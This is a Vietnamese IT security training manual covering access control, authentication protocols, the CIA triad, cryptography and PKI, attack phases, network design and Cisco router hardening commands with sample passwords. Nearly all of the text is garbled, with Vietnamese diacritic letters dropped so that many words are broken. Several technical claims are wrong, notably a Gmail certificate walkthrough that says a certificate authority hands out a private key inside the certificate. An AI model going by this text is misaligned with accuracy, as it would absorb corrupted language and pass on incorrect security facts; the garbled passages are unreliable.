Discretionary Access Control (DAC) + Ngi dng (Subjects) c iu khin truy cp qua ACLs. + Cc mc truy cp vo d liu c th c phn lm cc mc khc nhau (v d: NTFS Permission, vic gn quyn cho User/Group theo cc mc nh Full control, Modify, Read). + Access Control List c th c s dng khi gn Permission truy cp ti nguyn, hoc trn router, firewall. Khi s dng ACLs l phng thc iu khin truy cp Discretionary Access Control.

bng Access Control List ca NTFS Permission

Page | 25 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Role-Base Access Control + Ngi qun tr s da vo vai tr ca ngi dng gn quyn cho ngi dng. Nhng quyn ca ngi dng c th l nhng tc v ngi dng c th thc thi vi h thng. + V d ngi qun tr c th gn cc quyn cho User: Shutdown, change network setings, remote desktop, backup v mt s quyn khc da vo vai tr (role) ca ngi dng. + Trong h thng Windows ca Microsoft phng thc iu khin truy cp ny c th hiu l gn User Rights. + V d thit lp User Right ca h thng Microsoft.

Ngoi ra Access Control c th c chia lm hai dng: Centralized Access Control (CAC)

Page | 26 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Qu trnh xc thc v cp thm quyn c thc hin tp trung cho ton b h thng. C ba phng thc iu khin truy cp tp trung thng c s dng l: + Remote Authentication Dial-In User Service (RADIUS) + Terminal Access Control Access System (TACAS) + Active Directory Decetranlized Access Control Systems (DACS) L phng thc iu khin tp trung bao gm nhiu h thng CACs khc nhau trong mt t chc c tch hp trong cc h thng khc nhau khng cn lin quan ti phn cng v phn mm. Da vo cc hnh ng vi h thng Access Control cng c th c chia lm cc loi: + Administrative Controls

4. Khi nim v Authentications


a. Nhng yu t nhn dng v xc thc ngi dng
Cc phng thc xc thc ngi dng da vo cc yu t c bn: Something you KNOW Something you HAVE th) Something you ARE - Da vo mt vi ci bn bit (vd: user/pass) - Da vo mt vi ci bn c (vd: rt tin ATM bn phi c

- Da vo mt vi ci l bn (vd: vn tay, ging ni)

b. Cc phng thc xc thc


Trong thc t c kh nhiu phng thc xc thc ngi dng hay trong CNTT, mi dng xc thc c th ph hp vi mt hoc nhiu dch v khc nhau. Di y ti trnh by mt s phng thc xc thc hay c s dng trong CNTT. Page | 27 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

PAP -

Password Authentication Protocol

PAP c s dng bi cc ngi dng t xa cn xc thc qua cc kt ni PPP. PAP cung cp kar nng nhn din v xc thc ngi dng khi h kt ni t h thng t xa. Giao thc xc thc ny yu cu ngi dng phi nhp Pasword trc khi c xc thc. Username v Password c truyn i trn mng sau khi kt ni c thc hin qua PPP. Server xc thc cha d liu xc thc, khi ngi dng nhp thng tin s c gi v my ch ny. Ton b Username/Password c truyn trn mng hon ton khng c m ha (cleartext). CHAP Challenge Handshark Authentication Protocol CHAP l phng thc xc thc sinh ra khc phc cc im yu v l hng ca phng thc xc thc PAP. CHAP s dng phng thc challenge/response xc thc ngi dng. Khi ngi dng mun thit lp mt kt ni PPP c hai s phi ng s dng phng thc xc thc CHAP. Challenge c m ha s dng mt khu v encryption key. CHAP hot ng c m t trong m hnh di y:

Kerberos L phng thc xc thc m User/Password khng c truyn i trn mng. (VD: h thng Active Directory ca Microsoft s dng phng thc xc thc Kerberos). Phng thc xc thc Kerberos c th c miu t ging nh chng ta i xem phim:

Page | 28 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

+ u tin ngi dng phi c User/Password c thm quyn (i xem phim phi c tin) + Ngi dng yu cu mt dch v (ngi xem cn xem mt b phim chiu lc gi.) + Ngi dng a thm quyn ca mnh cho ngi xc thc (a tin mua v) + My ch KDC cung cp thm quyn truy cp dch v cho ngi dng (Phng v a v cho ngi mua) + Ngi dng mang thm quyn c cp mang ti my ch dch v (ngi xem phim a v ti phng chiu phim ngi xot v kim tra). Kerberos c th c miu t cc bc nh sau:

Multi factor L phng thc xc thc nhiu yu t. V d s dng dch v ATM ca ngn hng bn cn c th ngn hng + mt khu ( l xc thc da vo 2 yu t). Ngoi ra mt s dch v s dng nhiu phng thc xc thc kt hp nng cao mc bo mt.

Certificate

Page | 29 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

L phng thc xc thc rng ri trn Internet, cung cp kh nng xc thc an ton cho ngi dng. Khi ni dung c m ha gi i, ch c Private Key mi gii m c ni dung, v thng Private key khng c truyn i trn mng. V d qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:

Bc 1: Ngi dng truy cp gmail.com Bc 2: Gmail s gi thng tin ti Versign ly Certificate Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v Private key Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin xc thc Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail Bc 6: Gmail s dng Private key gii m Phng thc xc thc ny khng an ton khi nhim cc loi m c v nh Keylogger, ngi dng vn c kh nng mt User/Password RSA RSA phng thc xc thc t tin v an ton cho qu trnh xc thc v truyn thng tin trn Internet. RSA khc phc mt s nhc im ca phng thc xc thc Certificate. y l phng thc hay c s dng giao dch ngn hng. Biometric

Page | 30 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Phng thc xc thc s dng sinh trc hc nhn dng ngi dng nh dng: Vn tay, tnh mch, vng mc, m thanh, khun mt xc thc ngi dng.

5. Authorization
a. C bn v Authorization
Authorization (Dch ting Vit: S cp quyn) l vic cp quyn cho ngi dng trong mt h thng sau khi ngi dng xc thc (Authenticaion). Authorization th hin cc quyn m ngi dng c th thc thi trn h thng. Authorization lm vic trc tip vi iu khin truy cp Access Control V d: Trn h thng Authorization ca Windows sau khi ngi dng ng nhp (Authentication) h thng s cp quyn i vi: File v Folder c NTFS Permmission: Quyn c, ghi, xa, chnh sa. chnh l thm quyn ngi dng c cp i vi file v folder i vi h thng c User Right: Cp quyn chnh sa h thng cho ngi dng nh remote desktop, s thng s card mng..

b. Cc phng thc Authorization


RADIUS Remote Authentication Dial-in User Service (RADIUS) cung cp xc thc v iu khin truy cp s dng giao thc UDP xc thc tp trung cho ton b h thng mng. RADIUS c th s dng cho ngi dng truy cp VPN, RAS hay cung cp xc thc cho cc dch v s dng RADIUS. M hnh RADIUS xc thc cho h thng WIFI Kerberos Page | 31 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tng t nh phn Authentication TACACS Terminal Access Controller Access Control System (TACACS) iu khin truy cp bng cch xc thc v cp thm quyn trong h thng UNIX network. Hot ng tng t nh h thng RADIUS, khi mt h thng cn xc thc s chuy n qua Username v Password cho my ch TACACS v my ch ny s xc thc v cp quyn truy cp. TACACS s dng dch v UDP v TCP qua port 49. TACACS+ Extended Terminal Access Controller Access Control System Plus (TACACS+) l mt bin th t TACACS. Tng t nh RADIUS giao thc TACACS+ cung cp xc thc v cp thm quyn c tnh nng Accounting cho vic cp thm quyn tp trung vi yu cu xc thc. LDAP Lightweight Directory Access Protocol (LDAP) cung cp truy cp ti directory services (dch v danh mc), c tch hp trong Microsoft Active Directory. LDAP c to ra nh mt phn gin lc ca dch v X.500 Directory Access Protocol, v s dng port 389. LDAP c s dng rt rng ri trong cc dch v cung cp directory nh: Directory Service Markup Language (DSML), Service Location Protocol (SLP), v Microsoft Active Directory. XTACACS L mt phin bn ca h thng TACACS c pht trin v cung cp bi Cisco v c gi li Extended Terminal Access Controller Access Control System (XTACACS). Dch v pht trin m rng t giao thc TACACS cho php h tr thm tnh nng Accounting v Auditing, vi hai tnh nng ch c trong TACACS+ v RADIUS. IEEE 802.1x Page | 32 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

IEEE 802.1x l chun cho wireless, s dng port ph thuc vo dch v cung cp xc thc (authentication) v cp thm quyn (authorization) nh RADIUS v TACACS+. Giao thc ny c th c s dng bo mt cho cc giao thc WPA/WPA2. Ngoi ra IPsec cng l mt giao thc kh ph bin c s dng kt hp vi IEEE 802.1x cung cp bo mt cho h thng mng.

6. Khi nim v Accounting


Gim st l qun l vic truy cp vo h thng ra sao v vic truy cp din ra nh th no. - Qun l gim st s gip ngi qun tr xc nh c li do ai ai v l li g ngi qun tr hon ton c th bit c vic cn thit khi phc li mt cch nhanh nht. Ngoi ra nh gim st m ngi qun tr s pht hin ra k thm nhp bt hp php vo h thng , ngn chn cc cuc tn cng. Vic bn truy cp vo v lm g cng cn qun l bi v trn thc t th 60% cc cuc tn cng l bn trong h thng 40% l ngoi Internet. Vic ngn nga nhng tn cng t trong mng rt kh v h hiu c h thng v c ch bo mt ca h thng. Ngi qun tr s gim st nhng thuc tnh truy cp, xc thc pht hin ra cc tn cng v mi e do ca h thng. t

Vic trnh din cc kt ni cng rt quan trng, thng qua cc kt ni bn c th nhn dng k tn cng t u v k nh lm g. thnh t chnh sau pht

Gim st truy cp v xc thc da trn nhng hin lhng v tn cng:

Truy cp li nhiu ln, kt ni theo mt giao thc khc khng c trong h thng, ng nhp sai mt khu nhiu ln,pht hin Scan mng.v.v.. Quy trnh gim: Gim st h thng: gim st tt c cc tin trnh Logon, tin trnh truy cp iu khin, tin trnh ca cc chng trnh chy trong h thng. Gim st truy cp mng, gim st cc giao thc, cc kt ni, mail v mt s tnh nng truy cp khc. Page | 33 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Gim st tnh nng backup sao lu Gim st tnh kh dng, tnh sn sng, tnh n nh thng tin

7. Tam gic bo mt CIA


Khi phn tch mt h thng bo mt chng ta cn phi c phng php lun. C vng d liu yu cu tnh mt ca thng tin, c vng d liu cn tnh ton vn, tt c cc d liu u phi c p ng khi yu cu l tnh sn sng ca h thng. - Tnh mt ca thng tin Tnh ton vn thng tin Tnh sn sng ca h thng L ba gc ca tam gic bo mt CIA ca mt i tng cn bo v:

a. Confidentiality
Tnh mt ca thng tin la mc bo mt cn thit nhm m bo nhng d liu quan trng khng b r r hay l thng tin.

Page | 34 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

K tn cng c th thc hin nhiu phng thc nhm t c mc ch l ly nhng thng tin mong mun. Nhng phng thc c th l gim st h thng mng, ly cc file cha mt khu, hay Social engineering. Thng tin c th b l do khng s dng cc phng thc m ha mnh khi truyn hay lu tr thng tin. Tnh mt ca thng tin c i din bi quyn READ.

b. Integrity
Tnh ton vn ca thng tin l mc bo mt cn thit nhm m bo tin tng ca thng tin khng b thay i hay ch c chnh sa bi ngi c thm quyn. K tn cng c th thc hin nhiu phng thc nhm thay i nhng thng tin mong mun. Nhng phng thc c th l t nhp vt qua cc qu trnh xc thc, hoc tn cng khai thc l hng bo mt ca h thng. y l mc bo mt thng tin quan trng, hng nm c rt nhiu t chc doanh nghip b tn cng khai thc l hng bo mt v b thay i d liu. Tnh ton vn ca thng tin c i din bi quyn MODIFY.

c. Availability
Cho ti truy cp d liu ca bn Hy bt my tnh ca ti ln trc Kh nng p ng ca thng tin l iu rt quan trng, iu ny th hin tnh sn sng phc v ca cc dch v. Kh nng p ng ca h thng chu nh hng bi kh nhiu thnh phn: c th l phn cng, phn mm hay h thng Backup. Kh nng p ng ca h thng cn c tnh n da trn s ngi truy cp v mc quan trng ca d liu.

Page | 35 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

8. Mt m hc c bn
a. Khi nim c bn v mt m hc
Mt h thng m ha (cipher system) cung cp mt phng php bo v thng tin bng vic m ha chng (encrypting) thnh mt dng m ch c th c bi ngi c thm quyn vi h thng hay mt ngi dng c th. Vic s dng v to h thng gi l mt m (cryptography). Mt m c s dng t rt sm trong lch s loi ngi, trc khi c CNTT c rt nhiu phng thc m ha c s dng. V d: M ha kinh thnh, m ha Caesa, trong chin tranh th gii th 2 qun i c s dng c my m ha bng c hc bo v cc bc th trong chin trng. Ngnh cng nh thng tin c cc phng thc m ha c bn sau: - Hm bm HASH M ha i xng Symmetric M ha bt i xng Assymmetric

hiu v nghin cu v mt m cn phi hiu mt s khi nim: Cleartext hay Plantext: L d liu cha c m ha Ciphertext: L d liu sau khi c m ha Encrypt: Qu trnh m ha Algorithm: Thut ton m ha c x dng trong qu trnh m ha Key: Key c s dng bi thut ton m ha trong qu trnh m ha Decrypt: Qu trnh gii m

b. Hm bm Hash
Hash l mt phng php hay thut ton c s dng kim tra tnh ton vn ca d liu, kim tra s thay i ca d liu. Hash c hai thut ton c bit ti nhiu nht: SHA v MD5. Page | 36 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Khi d liu c truyn trn mng hay lu tr hon ton c th b thay i, ngi nhn thng tin mun kim tra xem d liu c cn ton vn hay khng th ch cn kim tra chui Hash ca d liu ban u v d liu nhn c. S dng hm bm kim tra nu hai chui Hash ging nhau th d liu vn cn ton vn cha b chnh sa v ngc li. Thc hnh: S dng MD5 hash mt file

c. M ha i xng Symmetric
Symmetric Key Cryptography l mt h thng m ha s dng mt key m ha v gii m. Phng php m ha ny c u im l d dng s dng v tch hp hn l phng thc m ha bt i xng (Assymmetric). V tc m ha v gii m cng nhanh hn phng thc m ha bt i xng. Tuy nhin do c qu trnh m ha v gii m s dng mt Key nn thng key c thit lp sn hai u ngi gi v ngi nhn (vd: IPsec), hay thng tin c chia s c m ha v ch c ngi c key mi m ra c. M ha i xng thng c s dng m ha d liu, cn m ha bt i xng thng c dng cho xc thc v truyn key. C rt nhiu thut ton m ha i xng nhng hay dng nht hin nay l thut ton AES (Advanced Encrypt Standard).

d. M ha bt i xng Assymmetric
Assymmetric Key Cryptograph y l mt h thng m ha s dng mt cp key: Public key v Private Key thc hin cho qu trnh m ha v gii m. Thng thng h thng ny hay s dng Public key m ha v s dng Private Key gii m:

Page | 37 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Hnh m t qu trnh m ha v gii m ca Assymmetric Do qu trnh sinh key v cung cp Key phc tp nn vic tch hp v s dng phng thc m ha ny khng d nh Symmetric. Thc hin m ha v gii m mt nhiu ti nguyn hn nn phng thc ny thng dng vo qu trnh xc thc ngi dng. Tuy nhin hin nay h thng my tnh rt mnh (VD: Google) nn phng thc ny c th c s dng truyn d liu. c th thc hin c phng thc m ha ny i hi phi c mt h thng: To, cung cp, qun l v khc phc s c cung cp Key (public, private). H thng ny gi l Public Key Infrastructure (PKI). Thut ton m ha RSA l mt thut ton m ha bt i xng, c s dng rng ri nht. M t thut ton =>

Page | 38 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

e. Tng quan v h thng PKI


thut ton m ha bt i xng (Assymmetric) hot ng cn mt h thng: Sinh Key, Cung cp Key, Qun l Key, Thit lp chnh sch vi Key, h thng c gi l Public Key Infrastructure vit tt l PKI. PKI c s dng rng ri cung cp h thng bo mt cho ng dng v mng, iu khin truy cp, ti nguyn t website, bo v email v nhiu th khc. PKI bo v thng tin bi cung cp cc tnh nng sau: - Identify authentication: Cung cp nhn din v xc thc Integrity verification: Kim tra tnh ton vn d liu Privacy assurance: m bo s ring t Access authorization: Cp thm quyn truy cp ti nguyn Transaction authorization: Thc thi vic cp thm quyn truy cp ti nguyn Nonrepudiation support: H tr tnh nng chng chi b

Tip theo chng ta cn quan tm ti cc chun v PKI, mi chun ca h thng PKI c p dng cho cc h ng dng v h thng sau:

PKIX Working Group ca t chc IETF pht trin chun Internet cho PKI da trn chun X.509 v Certificate, v c trng tm: X.509 Version 3 Public Key Certificate v X.509 Version 2 Certificate Revocation List (CRLs). PKI Management Protocols Operational Protocols

Page | 39 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Certificate Policies v Certifcate practice statements (CPSs) Time-stamping, data-certification, and validation services.

Ni PKIX c pht trin da trn Internet Standards X.509, Public Key Cryptography Standard (PKCS) l phng thc m ha d liu c pht trin v cng b bi RSA Lab, hin nay l mt phn ca hng RSA. Trong c 15 ti liu c th v PKCS, v d: - PKCS #1 RSA Cryptography Standard cung cp xut v trin khai h thng mt m Public Key da trn thut ton RSA PKCS #2 c tch hp sn vo PKCS #1 PKCS #15: Di y l thng tin ca mt Certificate theo chun X.509

H thng PKI gm cc thnh phn: - Certificate Authority (CA)

Page | 40 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

CA l thnh phn quan trng trong khi nim v h thng PKI. Cc nh cung cp CA v nh VeriSign hay Entrust. L h thng cung cp Certificate. Registration Authority (RA) RA cung cp xc thc ti CA v c coi nh mt Client yu cu chng ch s. Digital Certificates Chng ch s l d liu bao gm public key cryptography, hu ht Certificate u da trn cu trc ca chun X.509. bao gm

Certificate Policies L chnh sch cho chng ch s, nhn din vic s dng chng ch s. Nhng thng tin c th nh: S dng bo v thng tin vi CA Phng thc xc thc vi CA Qun l Key Qun l s dng Private Key Thi gian s dng chng ch s Cp mi Cho php exporrt private key di ti thiu ca Public key v Private Key

Certificate Practice Statement CPS l ti liu c to ra v cng b bi CA cung cp cc thng tin ph thuc vo h thng CA s dng chng ch s. CPS cung cp thng tin CA s dng

Page | 41 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

V d trn VeriSign l CA, Thawte SGC CA l CSP v thng tin s dng cho dch v accounts ca Google. Revocation (Thu hi key) Khi chng ch s c s dng, chng cng c th c thu hi. Qu trnht hu hi mt chng ch s c thc hin trc khi n b qu hn. Qu trnh thu hi m bo mt chng ch s khng th tn ti qu thi gian quy nh lc CA to ra. Trust models H thng PKI c cu trc n gin l c mt CA. Mt CA trong cu trc cho php to v qun l chng ch s nhng m hnh ny ch p dng i vi cc t chng nh bi v tnh n gian. Nhng nu CA li ton b h thng s dng dch v u b li. gim thiu ri ro cho h thng PKI cho php xy dng h thng c cu trc bao gm Root CA l tng trn cng sau l cc tng CA con, gia CA con c qun l khi b li c th xy dng li n gin. l h thng Trust Models

f. Thc hnh m ha v gii m vi cng c Cryptography tools


9. Khi nim c bn v tn cng mng

a. bc c bn ca mt cuc tn cng
Thng thng mt cuc tn cng c chia lm cc bc c bn nh di y:

Page | 42 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bc 1: Reconnaissance (trinh thm) L bc u tin ca bt k cuc tn cng no. K tn cng c gng ly cng nhiu thng tin v i tng cng tt v ch yu qua hai phng thc (Active/Passive). Passive: k tn cng c th tm thng tin v i tng qua cc knh thng tin Active: k tn cng thc hin theo di v n tn a im hay v tr ca mc tiu v tm hiu. Mc tiu ca bc ny l xc nh c mc tiu.

Bc 2: Scan Bc th hai thc hin sau khi xc nh c mc tiu. Bc Scan nhm mc tiu xc nh c cc k h ca i tng. T lp bng lit k c ton b cc yu t c th thc hin xm nhp vo h thng.

Bc 3: Gaining Accesss Khi pht hin c cc im yu ca h thng, k tn cng la chn mt hoc nhiu l hng t tin hnh tn cng v chim quyn iu khin.

Bc 4: Maintaining Access Khi thc hin tn cng thnh cng, ln sau truy cp vo h thng n gin hn k tn cng thng s dng Virus, Trojan, backdoor hay nhng on shell code.

Page | 43 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bc 5: Clearing Track K tn cng thc hin xa nhng du vt truy cp ca mnh nh vic xa log.

b. Mt s khi nim v bo mt.


Threat Mt hnh ng hay mt tnh hung c th nh hng ti bo mt. Threat l mt nguy c nh hng ti bo mt ca h thng Vulnerability L l hng bo mt ca h thng. Target of Evaluation L mt h thng cng ngh thng tin l ch ca cuc tn cng Attack Tn cng h thng mng c th c chia lm hai dng: + Active Attack + Passive Attack Tn cng h thng c th c chia lm nhiu dng khc. Ly thng tin, thay i thng tin hay ph hy thng tin l nhng mc ch c bn nht ca cc cuc tn cng Exploit L hnh thc khai thc l hng bo mt

c. Cc phng thc tn cng c bn


Brute Force L phng thc tn cng m k tn cng s dng nhng password n gin th ln lt nhm on ra mt khu ca ngi dng. Phng thc ny ch p dng i vi nhng mt khu n gin. Dictionary L phng thc tn cng tng t Brute force nhng thay v th ln lt mt khu ,k tn cng s dng b t in cha mt khu cn th. Spoofing

Page | 44 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

L dng tn cng m mt c nhn, mt h thng thc hin hnh vi gi mo. V nh mt ngi gi mo a ch mail gi i m khng cn phi xc thc. DoS L dng tn cng m mt ngi hay mt h thng lm cho mt h thng khc khng th truy cp hoc b chm i ng k bng cch s dng ht cc ti nguyn. Man-in-the-middle K tn cng bng mt cch no ng gia lung cng ng gia giao tip ca hai my tnh. Replay V d: khi mt qu trnh xc thc c thc hin thnh cng v b k tn cng capture c qu trnh . Khi cn ng nhp vo h thng, k tn cng pht li lung traffic thc hin xc thc. l phng thc tn cng Replay Sesion Hijacking Khi ngi dng thc hin thnh cng qu trnh xc thc, k tn cng thc hin tn cng cp phin giao tip. Dng tn cng l Session Hijacking.

d. ch ca cc dng tn cng
Cc dng tn cng c chia theo ch ca dng tn cng : o Operating System: ch tn cng l cc h iu hnh. Ngy nay cc h iu hnh rt phc tp vi nhiu serivice, port, nhiu ch truy cp. Vic v cc l hng bo mt ngy cng phc tp v i khi vic cp nht khng c thc hin. K tn cng thc hin khai thc cc l hng bo mt trn cc h iu hnh . o Application: ch tn cng l cc ng dng. Cc ng dng c pht trin bi cc hng phn mm c lp v i khi ch quan tm ti p ng nhu cu cng vic ca ng dng m qun i vic phi bo mt cho ng dng. Rt nhiu ng dng c l hng bo mt cho php hacker khai thc. o Shrink Wrap: Cc chng trnh, ng dng i khi b l m code v vic ny cng l l hng bo mt rt ln. o Misconfiguration: cc thit lp sai trn h thng i khi to k h cho k tn cng thc hin khai thc.

Page | 45 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Page | 46 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

III.

INFRASTRUCTURE SECURITY (AN NINH H TNG).


Cc gii php v l trnh xy dng bo mt h tng mng Thit k m hnh mng an ton Thnh phn bo mt trong h tng mng Bo mt cho h iu hnh Xy dng chnh sch an ton thng tin

Trong phn ny gm cc ni dung chnh sau:

Page | 47 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

1. Cc gii php v l trnh xy dng bo mt h tng mng c th xy dng mt h thng mng m bo tnh an ton cn phi c l trnh xy dng hp l gia: Yu cu v Chi ph c th chi tr t la chn nhng gii php. Gii php ph hp nht phi cn bng c cc yu t: Tnh nng yu cu Gi thnh gii php Tnh nng Hiu nng ca h thng

VD1: Chng ta khng th xy dng gii php hng triu $ bo v cho mt my c nhn khng quan trng c. VD2: Chng ta cn bo v cho h thng web, u cn nhng tnh nng v Endpoint security VD3: Chng ta khng th chim 50% Performance ca h thng cho cc chng trnh bo v c. Bt k doanh nghip hay t chc no cng khng th cng mt lc c th trin khai ton b cc gii php bo mt, iu ny t ra cn phi c l trnh xy dng r rng. Mt l trnh xy dng cn phi p ng tnh ph kn v tng thch gia cc gii php vi nhau trnh chng cho v xung t. Mt n v c th da vo l trnh ny c th xy dng c mt h tng CNTT p ng tnh bo mt. Di y l l trnh cc bc cng nh gii php xy dng mt h thng mng m bo tnh bo mt cao

Page | 48 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Page | 49 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

3. Thit k m hnh mng an ton cc gii php v an ton thng tin lm vic khng b trng lp v xung t cn phi c m hnh thit k ph hp. Di y l mt m hnh ti thy t thit k cc vng, thit b s dng, truy cp t xa, tnh HA u c: Ti c kh nhiu cun v Security nhng cha thy cun no c m hnh dng Module nh th ny, a phn l nhng m hnh n gin v thiu tnh thc t.

Phn tch tng quan m hnh c chia lm cc module: + Module Internet gm: Router, Proxy v ti u ha bng thng, Firewall

Page | 50 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

+ Module DMZ: IPS bo v v cc Server public ra internet + Module Core: Vng Routing v Switching li ca ton b h thng, ni thit lp Access Controll List cho cc vng. + Module Server Farm: Ni cha cc server quan trng nh my ch d liu, core banking c gim st bi thit b IDS + Module Management: L vng mng an ton cm cc cng qun tr ca cc thit b v my ch + Vng User: Cung cp mng cho ngi dng ti c quan + Branch: Kt ni ti cc mng chi nhnh trn c nc. Phn tch cc thit b bo mt: + Router v Switch Core thit lp Access Controll List v m bo tnh HA cho ton b cc kt ni + Proxy ng ra ti u ha bng thng Input-Output + Firewall c chc nng ng m port v public server cng nh cho cc kt ni VPN + IPS thit b gim st, pht hin v ngn chn cc cuc tn cng mng + Endpoint Security: Gii php Endpoint cho my trm my ch + Gii php Data Loss Prevent chng tht thot d liu + Network Access Control qun l truy cp mng 4. Router v Switch a. Chc nng ca Router - Routing: thc hin vic Routing cc gi tin trn mng - NAT: Thc hin NAT cc a ch IP t private public v ngc li Page | 51 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- Access Control List: Cho php to cc Access Control List p ng yu cu chn port, ip ca ngi qun tr. b. Chc nng ca Switch - Thc hin vic Switch cc gi tin Layer 2 c. Bo mt trn Switch - Chia VLAN: Cho php to ra nhiu mng trn mt Switch, trnh c s bng n ca Virus hay cc dng tn cng khc. - Security Port: Gn c nh mt s a ch MAC vo mt port nht nh trn Switch, cho php chn c cc dng tn cng nh MAC Spoofing, ARP Spoofing. d. Bo mt trn Router - Router l thit b rt quan trng trong m hnh mng, cho php routing, nat v to ra cc ACLs bo v h thng mng t tng Gateway. Lab: Ci t Packet Tracert 4.0 test mt s cu lnh trn Router. Hiu v Access Control List

Trn Router Cisco to ra mt Access List (ch p dng cho a ch IP) s dng cu lnh:

Page | 52 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Router(config)# access-list access list number {permit|deny} source [sourcemask]

p dng Access List va to: Router (config-if)# ip access-group access-list-number {in|out}

To v p dng Extended Access Control List (cho php p dng cho port v IP). Router(config)# access-list access-list-number {permit|deny} protocol source source-mask destination destination mask [operator|operand] Router(config-if)#ip access-group access-list number {in|out}

Xem li h thng Log trn Router chng ta c th bit c h thng block hay nhng ai truy cp vo Router. e. Thit lp bo mt cho Router t a ch IP trn mt Interface: Router> Enable Router# Configure Terminal Router (Config)# Interface Ethernet 0 Router (Config-if)# ip address 192.168.0.35 255.255.255.0

t Password cho Console login Router#config terminal Router(config)#line console 0 Router(config-line)#login Router(config-line)#password l3tm3!n Router(config-line)#^Z Router#

t password cho remote Router#config terminal Router(config)#line vty 0 Router(config-line)#login

Page | 53 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Router(config-line)#password l3tm3!n Router(config-line)#^Z Router

To User trn Router Router#configure terminal Router(conf)#username Auser password u$3r1 Router(conf)#username Buser password u$3r2 Router(conf)#username Cuser password u$3r3 Router(conf)#username Duser password u$3r4 Router(conf)#^Z

Thit lp ng nhp qua SSH trn Router Router#configure terminal Router(config)#ip domain-name scp.mil Router(config)#access-list 23 permit 192.168.51.45 Router(config)#line vty 0 4 Router(config-line)#access-class 23 in Router(config-line)#exit Router(config)#username SSHUser password No+3ln3+ Router(config)#line vty 0 4 Router(config-line)#login local Router(config-line)#exit Router(config)# Router#configure terminal Router(config)#crypto key generate rsa The name for the keys will be: Router.scp.mil Choose the size of the key modulus in the range of 360 to 2048

Page | 54 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

for your General Purpose Keys. Choosing a key modulus greater than 512 may take a few minutes. How many bits in the modulus [512]: 1024 Generating RSA keys ... [OK] Router(config)# Router#configure terminal Router(config)#ip ssh timeout 45 Router(config)#^Z Router#configure terminal Router(config)#ip ssh authentication-retries 2 Router(config)#^Z Router#configure terminal Router(config)#line vty 0 4 Router(config-line)#transport input ssh telnet Router(config-line)#^Z Router# show ip ssh

Thit lp static route trn router

MarketingRouter#config terminal

Page | 55 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1 MarketingRouter(config-line)#^Z MarketingRouter# FinanceRouter#config terminal FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2 FinanceRouter(config-line)#^Z FinanceRouter#

Thit lp RIP (Dynamic route) trn Router LEFT#configure terminal LEFT(config)#router rip LEFT(config-router)#network 172.16.0.0 LEFT(config-router)#network 192.168.10.0 LEFT(config-router)^Z LEFT#

Bo mt Router trc cc dng ICMP Router#config terminal Router(config)#interface Serial 0 Router(config-if)#no ip unreachables Router(config-if)#^Z Router#config terminal Router(config)#interface Ethernet 0 Router(config-if)#no ip directed broadcast Router(config-if)#no ip unreachables Router(config)#interface Serial 0 Router(config-if)#no ip directed broadcast

Page | 56 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Router(config-if)#no ip unreachables Router(config)#interface Serial 1 Router(config-if)#no ip directed broadcast Router(config-if)#no ip unreachables Router(config-if)#^Z

Bo v Source Routing Router#config terminal Router(config)#no ip source-route Router(config)#^Z Router#

Small Services Router#config terminal Router(config)#no service tcp-small-servers Router(config)#no service udp-small-servers Router(config)#^Z Router#

Chng Finger Router#config terminal Router(config)#no service finger Router(config)#^Z Router# Router#config terminal Router(config)#no ip finger Router(config)#^Z Router#

Tt cc Services khng cn thit Page | 57 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Router#config terminal Router(config)#no ip bootp server Router(config)#no ip name-server Router(config)#no ntp server Router(config)#no snmp-server Router(config)#no ip http server Router(config)#^Z

